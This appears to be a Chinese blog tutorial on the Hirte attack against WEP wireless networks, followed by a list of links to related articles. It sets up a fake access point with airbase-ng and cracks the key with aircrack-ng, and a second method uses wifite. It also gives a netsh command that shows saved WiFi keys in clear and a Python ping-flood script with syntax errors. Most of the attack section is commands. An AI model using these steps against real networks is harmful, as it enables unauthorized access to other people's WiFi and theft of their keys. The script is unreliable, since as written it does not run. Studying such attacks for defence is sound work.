目录
一.Hirte介绍
二.Hirte破解原理
三.破解方式1
1.查看网卡信息
2.监听网卡
3.扫描附近的wifi
4.配置airodump-ng捕捉数据包并保存数据包文件名字为HSEK
5.开始伪造AP,用airbase-ng工具建立WEP接入点
6.只要有客户端连上来,就会进行攻击
7.启动aircrack-ng从捕获的数据包中解密
可能出现的错误及解决方法:
四.破解方式2(比1好用多了)
1.扫描并指定破解方式
2.加速ivs收集
3.开启攻击脚本
4.获得密钥
一.Hirte介绍 Hirte是破解无线网络WEP key的一种攻击类型
只要客户端设备(笔记本,手机等)连接过无线网络,哪些wifi即使是不再攻击者范围内也能被破解,因为该wifi的WEP密钥和配置文件仍然存储再这些无线设备中
netsh wlan show profile name="wifi_name" key=clear
在cmd中输入上列代码,即可查看已连接过WiFi的相关信息
实施这种攻击的要求是建立一个和WEP网络相同的SSID假冒接入点,当客户端设备尝试自动连接无线网络时,假冒接入点(攻击者机器)会对受害者设备进行ARP攻击,导致受害者设备将包含密钥流数据包发出
二.Hirte破解原理 1.安装一个假的WEP AP(wifi名,mac地址要相同)并等待客户端连接
假的AP将他的信标帧和真的AP放到同一个信道上,都叫做wifi_name,这时候客户端无法分清哪个是真的哪个是假的,就两个都发,
就像快递一样,把你家的门牌号涂改成邻居家的门牌号,快递小哥给邻居家送快递的时候就有可能送到你家
2.客户端的连接等待自动分配IP地址(可能会卡在这一步,因为kali自身的问题)
3.客户端发送一个ARP数据包
4.获得了ARP分组,并且将其转换成一个ARP请求为同一客户机
5.客户回复
6.收集这些数据包
7.破解WEP密钥
三.破解方式1 1.查看网卡信息
ip a
2.监听网卡
airmon-ng start wlan0
3.扫描附近的wifi
airodump-ng wlan0mon
4.配置airodump-ng捕捉数据包并保存数据包文件名字为HSEK
airodump-ng wlan0mon --bssid ?? --write HSEK
5.开始伪造AP,用airbase-ng工具建立WEP接入点
airbase-ng -c 1 -a ? --essid "?" -W 1 -N wlan0mon
参数说明:
-c 信道
-a 模拟AP的mac地址
--essid:wifi的名称
-W:设置加密位
-N:使用Hirte攻击模式
wlan0mon:是接口
6.只要有客户端连上来,就会进行攻击 【无线安全渗透与防御|WEP-渗透WEP新思路--Hirte】
文章图片
D8.....是网卡
18:。。。。是客户端
模拟客户端和AP进行通讯
7.启动aircrack-ng从捕获的数据包中解密
aircrack-ng HSEK-01.cap
破解密码是有要求的,第一次ivs必须要大于5000(#Date那一栏),当小于这个数的话,就会提示数量不足
文章图片
数量够多,且成功的话,有下图提示
文章图片
可能出现的错误及解决方法: 1.出现连接不上,ping请求超时
解决:断开ARP攻击,让客户端连接起来或ping成功后在攻击
文章图片
四.破解方式2(比1好用多了) 1.扫描并指定破解方式
wifite -wep -hirte
2.加速ivs收集
ping -t 192.168.1.1
3.开启攻击脚本 启动cmd.py
import os
import threading
import timeclass myThread (threading.Thread);
def __init__(self):
threading.Thread.__init__(self)
def run(self):
cmd="ping /t 192.168.1.1"
os.system(cmd)
time.sleep(0.1)threads=[]for i in range(50)
thread1 = myThread()
thread1.start()
threads.append(thread1)for item in threads:
item.join()
print ("退出主线程")
4.获得密钥
文章图片
推荐阅读
- 汇编----寄存器
- 无线安全渗透与防御|无线渗透-----aircrack-ng破解WEP加密
- ARP攻击
- 无线安全渗透与防御|无线渗透----扫描附近WiFi(windows系统)
- 网络安全|永恒之蓝MS17-010exp复现
- 中职网络安全竞赛题目解析|2022年网络安全国赛内存取证WP
- JAVA|Spring boot和Vue.js实现基于oauth2授权码模式的认证 (一)
- 渗透测试|【文件上传绕过】——后端检测_MIME-TYPE检测漏洞
- 渗透测试|【文件包含漏洞】——文件包含漏洞防御